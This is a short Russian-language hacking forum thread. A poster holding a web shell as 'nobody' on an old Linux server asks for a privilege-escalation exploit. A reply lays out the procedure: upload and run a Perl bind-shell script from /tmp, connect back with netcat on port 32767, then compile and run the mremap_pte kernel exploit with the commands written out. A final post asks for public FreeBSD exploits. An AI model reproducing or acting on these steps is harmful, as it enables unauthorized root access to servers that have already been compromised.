Ку!Есть шелл на сервере с такой ОС Linux 2.4.21-40.ELsmp,права у меня uid=99(nobody) gid=99(nobody) groups=99(nobody)! Сервер :Apache/1.3.37 (Unix) ========================================= Вопрос :Есть сплоит для поднятий привилегий? Я искал не нашел! Или есть другой способ как добыть права ближе к руту! ========================================== Заранее спасибо! З.Ы Я вот здесь нашел какойто сплоит подойдет он ! С меня +++++
Будем брать експлоитом mremap_pte. Для этого нам надо пробиндить тачку, что бы получить шелл обалочку. Ищем открытую папку для заливки файла. По дефолту это папка tmp. Залеваем bind.pl и запускаем командой perl bind.pl. Открываем net cat и вбиваем www.xxxxxxx.xxx 32767. Появился back conect. Проверяем на наличии компилятора командой which gcc. Залеваем наш експлоит в tmp. Компилим gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte. Запускаем ./mremap_pte и проверяем права.
Чтобы новую тему не открывать спрошу сдесь. FreeBSD 5.5-RELEASE-p2 для этого существуют сплоиты в паблике ?